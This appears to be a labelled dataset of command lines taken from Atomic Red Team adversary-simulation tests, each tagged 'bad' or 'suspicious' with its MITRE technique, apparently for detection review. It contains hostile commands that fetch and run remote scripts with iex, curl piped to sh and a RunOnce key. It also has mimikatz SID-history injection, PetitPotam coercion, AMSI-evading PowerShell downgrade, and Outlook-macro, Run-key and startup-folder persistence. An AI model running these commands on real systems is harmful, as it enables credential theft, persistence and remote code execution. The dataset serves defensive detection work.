'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Add Root Certificate to CurrentUser Certificate Store,T1553.004,"[""T1553.004""]",windows,0.9,False,"The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 384520526b044a8f7b9f6d71,Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item,Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1553.004/T1553.004.yaml,Add Root Certificate to CurrentUser Certificate Store,T1553.004,"[""T1553.004""]",windows,0.55,True,"The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8444be2e6f6d765be722f759,"#{mimikatz_path} ""privilege::debug"" ""sid::patch"" ""sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}"" ""exit""","#{mimikatz_path} ""privilege::debug"" ""sid::patch"" ""sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}"" ""exit""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.005/T1134.005.yaml,Injection SID-History with mimikatz,T1134.005,"[""T1134.005""]",windows,0.9,False,"Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ddb487e1411487c7ff11f33d,"#{mimikatz_path} ""sid::clear /sam:#{sam_account_name}"" ""exit""","#{mimikatz_path} ""sid::clear /sam:#{sam_account_name}"" ""exit""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.005/T1134.005.yaml,Injection SID-History with mimikatz,T1134.005,"[""T1134.005""]",windows,0.55,True,"Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2395e76287220108a079765d,"& ""#{petitpotam_path}"" #{captureServerIP} #{targetServerIP} #{efsApi} Write-Host ""End of PetitPotam attack""","& ""#{petitpotam_path}"" #{captureServerIP} #{targetServerIP} #{efsApi} Write-Host ""End of PetitPotam attack""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1187/T1187.yaml,PetitPotam,T1187,"[""T1187""]",windows,0.9,False,"This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a4b3c122563df66ba778d6d0,"iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1') Invoke-Internalmonologue -command ""-Downgrade true -impersonate true -restore true""","iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1') Invoke-Internalmonologue -command ""-Downgrade true -impersonate true -restore true""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1187/T1187.yaml,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,T1187,"[""T1187""]",windows,0.9,False,PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 59fa7f5fab8c296deddbc9da,rpcping -s #{server_ip} -e #{custom_port} /a connect /u NTLM 1>$Null,rpcping -s #{server_ip} -e #{custom_port} /a connect /u NTLM 1>$Null,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1187/T1187.yaml,Trigger an authenticated RPC call to a target server with no Sign flag set,T1187,"[""T1187""]",windows,0.9,False,"RpcPing command can be used to trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign flag not Set) Ref: https://twitter.com/splinter_code/status/1421144623678988298",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5f07b35c935122b1ee670cab,"Invoke-WebRequest ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"" -OutFile #{output_file}","Invoke-WebRequest ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"" -OutFile #{output_file}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1074.001/T1074.001.yaml,Stage data from Discovery.bat,T1074.001,"[""T1074.001""]",windows,0.9,False,"Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e7dce5e4ab4e8ef9ac1b86a1,Remove-Item -Force #{output_file} -ErrorAction Ignore,Remove-Item -Force #{output_file} -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1074.001/T1074.001.yaml,Stage data from Discovery.bat,T1074.001,"[""T1074.001""]",windows,0.55,True,"Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1dad843a4b9750e98e3c0afb,curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file},curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1074.001/T1074.001.yaml,Stage data from Discovery.sh,T1074.001,"[""T1074.001""]","linux,macos",0.9,False,"Utilize curl to download discovery.sh and execute a basic information gathering shell script ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b99e4db34cd364adc283a7a1,rm #{output_file},rm #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1074.001/T1074.001.yaml,Stage data from Discovery.sh,T1074.001,"[""T1074.001""]","linux,macos",0.55,True,"Utilize curl to download discovery.sh and execute a basic information gathering shell script ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5837d2578a75e06b80e9701b,"Compress-Archive -Path ""#{input_file}"" -DestinationPath #{output_file} -Force","Compress-Archive -Path ""#{input_file}"" -DestinationPath #{output_file} -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1074.001/T1074.001.yaml,Zip a Folder with PowerShell for Staging in Temp,T1074.001,"[""T1074.001""]",windows,0.9,False,"Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 326decfbd4e09ddc87656655,Remove-Item -Path #{output_file} -ErrorAction Ignore,Remove-Item -Path #{output_file} -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1074.001/T1074.001.yaml,Zip a Folder with PowerShell for Staging in Temp,T1074.001,"[""T1074.001""]",windows,0.55,True,"Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7dfe9a4a9717498d535438b7,"reg add ""HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security"" /v Level /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo ""Atomic Red Team TEST"" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM","reg add ""HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security"" /v Level /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo ""Atomic Red Team TEST"" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1137/T1137.yaml,Office Application Startup - Outlook as a C2,T1137,"[""T1137""]",windows,0.9,False,"As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '1' - A file called VbaProject.OTM must be created in the Outlook Folder. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5e8d18d781d0a3aa587519d2,"reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security"" /v Level /f >nul 2>&1 del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1","reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security"" /v Level /f >nul 2>&1 del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1137/T1137.yaml,Office Application Startup - Outlook as a C2,T1137,"[""T1137""]",windows,0.55,True,"As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '1' - A file called VbaProject.OTM must be created in the Outlook Folder. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e7f8274f439c173a45cb71a2,"copy ""#{filename}"" %TEMP%\hello.js #{jscpath}\#{jscname} %TEMP%\hello.js","copy ""#{filename}"" %TEMP%\hello.js #{jscpath}\#{jscname} %TEMP%\hello.js",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1127/T1127.yaml,Lolbin Jsc.exe compile javascript to exe,T1127,"[""T1127""]",windows,0.9,False,"Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2297534e63054f2f450012d9,del %TEMP%\hello.js del %TEMP%\hello.exe,del %TEMP%\hello.js del %TEMP%\hello.exe,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1127/T1127.yaml,Lolbin Jsc.exe compile javascript to exe,T1127,"[""T1127""]",windows,0.55,True,"Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 23b57a45dd88e6d89ac86d7d,"copy ""#{filename}"" %TEMP%\LibHello.js #{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js","copy ""#{filename}"" %TEMP%\LibHello.js #{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1127/T1127.yaml,Lolbin Jsc.exe compile javascript to dll,T1127,"[""T1127""]",windows,0.9,False,"Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cf2ae50772392033d84f6118,del %TEMP%\LibHello.js del %TEMP%\LibHello.dll,del %TEMP%\LibHello.js del %TEMP%\LibHello.dll,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1127/T1127.yaml,Lolbin Jsc.exe compile javascript to dll,T1127,"[""T1127""]",windows,0.55,True,"Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0dbe44822952c1ad61bd1f82,"start ""#{docx_file}""","start ""#{docx_file}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1221/T1221.yaml,WINWORD Remote Template Injection,T1221,"[""T1221""]",windows,0.9,False,"Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 104ede3976b105369d78af81,"Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass} (Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = ""CommunitySupported""}) Disconnect-VIServer -Confirm:$false","Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass} (Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = ""CommunitySupported""}) Disconnect-VIServer -Confirm:$false",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.010/T1562.010.yaml,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,T1562.010,"[""T1562.010""]",linux,0.9,False,"An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a52e7e57313b566e38833e09,"echo """" | ""#{plink_file}"" ""#{vm_host}"" -ssh -l ""#{vm_user}"" -pw ""#{vm_pass}"" -m ""#{cli_script}""","echo """" | ""#{plink_file}"" ""#{vm_host}"" -ssh -l ""#{vm_user}"" -pw ""#{vm_pass}"" -m ""#{cli_script}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.010/T1562.010.yaml,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,T1562.010,"[""T1562.010""]",windows,0.9,False,"An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d5c6078d85209f2f5cbcd734,PowerShell -version 2 -command '#{v2_command}',PowerShell -version 2 -command '#{v2_command}',bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.010/T1562.010.yaml,PowerShell Version 2 Downgrade,T1562.010,"[""T1562.010""]",windows,0.9,False,"Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a8533033e59a4713af6d306f,docker build -t t1613 $PathtoAtomicsFolder/T1613/src/ docker run --name t1613_container --rm -d -t t1613 docker ps docker stats --no-stream docker inspect $(docker ps -l -q --filter ancestor=t1613),docker build -t t1613 $PathtoAtomicsFolder/T1613/src/ docker run --name t1613_container --rm -d -t t1613 docker ps docker stats --no-stream docker inspect $(docker ps -l -q --filter ancestor=t1613),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1613/T1613.yaml,Docker Container and Resource Discovery,T1613,"[""T1613""]",containers,0.9,False,Adversaries may attempt to discover containers and other resources that are available within a containers environment.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review abe198398ca2fb0f05edc5c3,docker stop t1613_container docker rmi -f t1613,docker stop t1613_container docker rmi -f t1613,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1613/T1613.yaml,Docker Container and Resource Discovery,T1613,"[""T1613""]",containers,0.55,True,Adversaries may attempt to discover containers and other resources that are available within a containers environment.,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1e1c2090b94a84e42368a40d,podman build -t t1613 $PathtoAtomicsFolder/T1613/src/ podman run --name t1613_container --rm -d -t t1613 podman ps podman stats --no-stream podman inspect $(podman ps -l -q --filter ancestor=t1613),podman build -t t1613 $PathtoAtomicsFolder/T1613/src/ podman run --name t1613_container --rm -d -t t1613 podman ps podman stats --no-stream podman inspect $(podman ps -l -q --filter ancestor=t1613),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1613/T1613.yaml,Podman Container and Resource Discovery,T1613,"[""T1613""]",containers,0.9,False,Adversaries may attempt to discover containers and other resources that are available within a containers environment.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 58be6172dcf5c88fdd592845,podman stop t1613_container podman rmi -f t1613,podman stop t1613_container podman rmi -f t1613,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1613/T1613.yaml,Podman Container and Resource Discovery,T1613,"[""T1613""]",containers,0.55,True,Adversaries may attempt to discover containers and other resources that are available within a containers environment.,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ad648f52bd0bca0e26b2b5a4,sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename},sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1543.004/T1543.004.yaml,Launch Daemon,T1543.004,"[""T1543.004""]",macos,0.9,False,"Utilize LaunchDaemon to launch `Hello World` ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8674e2d7b601c78919bb54d0,sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} sudo rm /tmp/T1543_004_atomicredteam.txt,sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} sudo rm /tmp/T1543_004_atomicredteam.txt,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1543.004/T1543.004.yaml,Launch Daemon,T1543.004,"[""T1543.004""]",macos,0.55,True,"Utilize LaunchDaemon to launch `Hello World` ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5ab6489c7da4f9ddf8e3d0a0,"Move-Item -Path ""C:\Windows\System32\termsrv_backup.dll"" -Destination ""C:\Windows\System32\termsrv.dll"" -Force -ErrorAction Ignore","Move-Item -Path ""C:\Windows\System32\termsrv_backup.dll"" -Destination ""C:\Windows\System32\termsrv.dll"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.005/T1505.005.yaml,Simulate Patching termsrv.dll,T1505.005,"[""T1505.005""]",windows,0.55,True,"Simulates patching of termsrv.dll by making a benign change to the file and replacing it with the original afterwards. Before we can make the modifications we need to take ownership of the file and grant ourselves the necessary permissions. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fda8aa59d572a29ab87b4301,"Set-ItemProperty -Path ""HKLM:\System\CurrentControlSet\services\TermService\Parameters"" -Name ""ServiceDll"" -Value ""C:\Windows\System32\termsrv.dll""","Set-ItemProperty -Path ""HKLM:\System\CurrentControlSet\services\TermService\Parameters"" -Name ""ServiceDll"" -Value ""C:\Windows\System32\termsrv.dll""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.005/T1505.005.yaml,Modify Terminal Services DLL Path,T1505.005,"[""T1505.005""]",windows,0.55,True,This atomic test simulates the modification of the ServiceDll value in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique may be leveraged by adversaries to establish persistence by loading a patched version of the DLL containing malicious code.,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0f77f68330964dfe1bdff907,"REG ADD ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /V ""Atomic Red Team"" /t REG_SZ /F /D ""#{command_to_execute}""","REG ADD ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /V ""Atomic Red Team"" /t REG_SZ /F /D ""#{command_to_execute}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Reg Key Run,T1547.001,"[""T1547.001""]",windows,0.9,False,"Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \""Atomic Red Team\"" to the Run key. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d9b446261478205c6d2bc625,"REG DELETE ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /V ""Atomic Red Team"" /f >nul 2>&1","REG DELETE ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /V ""Atomic Red Team"" /f >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Reg Key Run,T1547.001,"[""T1547.001""]",windows,0.55,True,"Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \""Atomic Red Team\"" to the Run key. Output will be via stdout. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c6ddb81009bdc7b2bbfb4f08,"REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d ""#{thing_to_execute}""","REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d ""#{thing_to_execute}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Reg Key RunOnce,T1547.001,"[""T1547.001""]",windows,0.9,False,"RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 07aed777baf12f15157b1c28,REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1,REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Reg Key RunOnce,T1547.001,"[""T1547.001""]",windows,0.55,True,"RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 56a46baf5881f0f08260b2a4,"$RunOnceKey = ""#{reg_key_path}"" set-itemproperty $RunOnceKey ""NextRun"" '#{thing_to_execute} ""IEX (New-Object Net.WebClient).DownloadString(`""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`"")""'","$RunOnceKey = ""#{reg_key_path}"" set-itemproperty $RunOnceKey ""NextRun"" '#{thing_to_execute} ""IEX (New-Object Net.WebClient).DownloadString(`""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`"")""'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,PowerShell Registry RunOnce,T1547.001,"[""T1547.001""]",windows,0.9,False,"RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 85b9e4f35ae37a78cf76fcd5,"Remove-ItemProperty -Path #{reg_key_path} -Name ""NextRun"" -Force -ErrorAction Ignore","Remove-ItemProperty -Path #{reg_key_path} -Name ""NextRun"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,PowerShell Registry RunOnce,T1547.001,"[""T1547.001""]",windows,0.55,True,"RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 84f63153cd5863c619e08622,"Copy-Item ""$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs"" ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"" Copy-Item ""$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs"" ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"" cscript.exe ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"" cscript.exe ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs""","Copy-Item ""$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs"" ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"" Copy-Item ""$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs"" ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"" cscript.exe ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"" cscript.exe ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Suspicious vbs file run from startup Folder,T1547.001,"[""T1547.001""]",windows,0.9,False,"vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, ""T1547.001 Hello, World VBS!"" will be displayed twice. Additionally, the new files can be viewed in the ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" folder and will also run when the computer is restarted and the user logs in. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 49fc253809cdf043ecbbf206,"Remove-Item ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"" -ErrorAction Ignore Remove-Item ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"" -ErrorAction Ignore","Remove-Item ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"" -ErrorAction Ignore Remove-Item ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Suspicious vbs file run from startup Folder,T1547.001,"[""T1547.001""]",windows,0.55,True,"vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, ""T1547.001 Hello, World VBS!"" will be displayed twice. Additionally, the new files can be viewed in the ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" folder and will also run when the computer is restarted and the user logs in. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 201a950801585beed04e8242,"Copy-Item ""$PathToAtomicsFolder\T1547.001\src\jsestartup.jse"" ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"" Copy-Item ""$PathToAtomicsFolder\T1547.001\src\jsestartup.jse"" ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"" cscript.exe /E:Jscript ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"" cscript.exe /E:Jscript ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse""","Copy-Item ""$PathToAtomicsFolder\T1547.001\src\jsestartup.jse"" 